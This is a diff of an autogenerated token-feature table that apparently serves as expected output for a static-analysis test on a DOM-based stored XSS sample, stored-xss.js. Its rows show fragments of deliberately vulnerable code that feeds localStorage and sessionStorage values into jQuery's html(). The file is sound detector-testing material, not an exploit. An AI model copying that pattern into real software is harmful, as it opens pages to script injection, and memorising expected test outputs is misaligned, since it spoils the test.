| | @@ -15255,6 +109060,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:6:7:6:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:7:6:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:7:6:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:15:6:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:15:6:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:15:6:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:15:6:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:15:6:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:31 | localStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:31 | localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:31 | localStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:31 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:31 | localStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:39 | localStorage.getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:39 | localStorage.getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:39 | localStorage.getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:39 | localStorage.getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:39 | localStorage.getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | exceptional return of localSt ... ssion') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | exceptional return of localSt ... ssion') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | exceptional return of localSt ... ssion') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | exceptional return of localSt ... ssion') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | exceptional return of localSt ... ssion') | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | localSt ... ssion') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | localSt ... ssion') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | localSt ... ssion') | contextFunctionInterfaces | | @@ -15262,6 +109087,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | localSt ... ssion') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | localSt ... ssion') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:20:6:50 | localSt ... ssion') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:33:6:39 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:33:6:39 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:33:6:39 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:33:6:39 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:33:6:39 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:41:6:49 | 'session' | CalleeFlexibleAccessPath | localStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:41:6:49 | 'session' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:41:6:49 | 'session' | contextFunctionInterfaces | | @@ -15270,6 +109100,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:6:41:6:49 | 'session' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:41:6:49 | 'session' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:41:6:49 | 'session' | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | $('myId ... ocal')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | $('myId ... ocal')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | $('myId ... ocal')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | $('myId ... ocal')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | $('myId ... ocal')) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | exceptional return of $('myId ... ocal')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | exceptional return of $('myId ... ocal')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | exceptional return of $('myId ... ocal')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | exceptional return of $('myId ... ocal')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:5:7:51 | exceptional return of $('myId ... ocal')) | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:7:7:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:7:7:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:7:7:12 | 'myId' | contextFunctionInterfaces | | @@ -15277,6 +109137,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:7:7:7:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:7:7:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:7:7:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:15:7:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:15:7:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:15:7:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:15:7:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:15:7:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:33 | sessionStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:33 | sessionStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:33 | sessionStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:33 | sessionStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:33 | sessionStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:41 | session ... getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:41 | session ... getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:41 | session ... getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:41 | session ... getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:41 | session ... getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | exceptional return of session ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | exceptional return of session ... local') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | exceptional return of session ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | exceptional return of session ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | exceptional return of session ... local') | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | session ... local') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | session ... local') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | session ... local') | contextFunctionInterfaces | | @@ -15284,6 +109164,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | session ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | session ... local') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:20:7:50 | session ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:35:7:41 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:35:7:41 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:35:7:41 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:35:7:41 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:7:35:7:41 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:43:7:49 | 'local' | CalleeFlexibleAccessPath | sessionStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:43:7:49 | 'local' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:43:7:49 | 'local' | contextFunctionInterfaces | | @@ -15292,6 +109177,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:7:43:7:49 | 'local' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:43:7:49 | 'local' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:7:43:7:49 | 'local' | receiverName | sessionStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | $('myId ... ocal')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | $('myId ... ocal')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | $('myId ... ocal')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | $('myId ... ocal')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | $('myId ... ocal')) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | exceptional return of $('myId ... ocal')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | exceptional return of $('myId ... ocal')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | exceptional return of $('myId ... ocal')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | exceptional return of $('myId ... ocal')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:5:8:49 | exceptional return of $('myId ... ocal')) | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:7:8:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:7:8:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:7:8:12 | 'myId' | contextFunctionInterfaces | | @@ -15299,6 +109214,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:8:7:8:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:7:8:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:7:8:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:15:8:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:15:8:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:15:8:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:15:8:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:15:8:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:31 | localStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:31 | localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:31 | localStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:31 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:31 | localStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:39 | localStorage.getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:39 | localStorage.getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:39 | localStorage.getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:39 | localStorage.getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:39 | localStorage.getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | exceptional return of localSt ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | exceptional return of localSt ... local') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | exceptional return of localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | exceptional return of localSt ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | exceptional return of localSt ... local') | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | localSt ... local') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | localSt ... local') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | localSt ... local') | contextFunctionInterfaces | | @@ -15306,6 +109241,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | localSt ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | localSt ... local') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:20:8:48 | localSt ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:33:8:39 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:33:8:39 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:33:8:39 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:33:8:39 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:8:33:8:39 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:41:8:47 | 'local' | CalleeFlexibleAccessPath | localStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:41:8:47 | 'local' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:41:8:47 | 'local' | contextFunctionInterfaces | | @@ -15314,6 +109254,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:8:41:8:47 | 'local' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:41:8:47 | 'local' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:8:41:8:47 | 'local' | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:12 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:12 | href | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:12 | href | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:12 | href | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:12 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href = ... local') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href = ... local') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href = ... local') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href = ... local') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:9:10:44 | href = ... local') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:27 | localStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:10:16:10:27 | 